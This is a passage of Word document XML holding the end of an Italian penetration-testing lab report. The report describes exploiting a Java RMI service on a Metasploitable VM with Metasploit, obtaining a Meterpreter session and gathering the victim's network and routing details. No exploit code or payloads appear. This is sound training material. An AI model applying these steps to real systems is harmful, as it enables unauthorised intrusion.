      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mask, l'indirizzo MAC e, potenzialmente, l'indirizzo del gateway e i </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">server DNS configurati sulla macchina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD0BC95" w14:textId="0AE5977C" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18B53954" wp14:editId="3D8B3DE1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-177165</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>131445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3009900" cy="1928495"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21337"/>
                <wp:lineTo x="21463" y="21337"/>
                <wp:lineTo x="21463" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="2114011335" name="Immagine 8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11335" name="Immagine 8" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corret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7436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tabella di Routing:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Il comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>route</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> è stato eseguito per visualizzare la tabella di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>routing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> della macchina vittima. Lo screenshot di questo output ha mostrato le rotte di rete attive sulla macchina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, indicando come il traffico di rete viene instradato verso diverse destinazioni. Questo include la rotta predefinita (se configurata) e le rotte specifiche per le reti locali o remote.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDF9E74" w14:textId="4B8D9AB0" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436"/>
    <w:p w14:paraId="3558992A" w14:textId="24F1398E" w:rsidR="00E07436" w:rsidRPr="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E07436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusioni:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B2692A" w14:textId="5539B754" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r>
        <w:t xml:space="preserve">L'esercizio ha dimostrato con successo lo sfruttamento di una vulnerabilità nel servizio Java RMI in esecuzione sulla macchina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> utilizzando il framework </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Attraverso una serie di passaggi che includono la preparazione dell'ambiente, la verifica della connettività, l'identificazione del servizio vulnerabile, la configurazione e l'esecuzione di un exploit specifico, è stato possibile ottenere una sessione remota </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA4FAF0" w14:textId="4BB9B8D5" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436">
      <w:r>
        <w:t xml:space="preserve">Una volta ottenuta la sessione, sono state raccolte le evidenze richieste sulla configurazione di rete e sulla tabella di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>routing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> della macchina vittima, fornendo informazioni cruciali sulla sua infrastruttura di rete. Gli screenshot acquisiti durante ogni fase hanno documentato in modo visivo il processo e i risultati ottenuti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3B96CF" w14:textId="77777777" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436"/>
    <w:p w14:paraId="72158A4B" w14:textId="77777777" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436"/>
    <w:p w14:paraId="3F674C44" w14:textId="77777777" w:rsidR="00E07436" w:rsidRDefault="00E07436" w:rsidP="00E07436"/>
    <w:p w14:paraId="6BA9C8A2" w14:textId="77777777" w:rsidR="003B790C" w:rsidRDefault="003B790C"/>
    <w:sectPr w:rsidR="003B79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36"/>
    <w:rsid w:val="003B790C"/>
    <w:rsid w:val="00850C5F"/>
    <w:rsid w:val="00B1031F"/>
    <w:rsid w:val="00CA5A39"/>
    <w:rsid w:val="00E0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3FE89"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{45268AFA-1FDC-464E-A253-7400CA17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0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0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07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7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7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07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07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743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743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743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743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743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743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7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7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743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743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743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7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743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7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Gugliotta</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Stefano Gugliotta</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-16T08:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-16T08:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>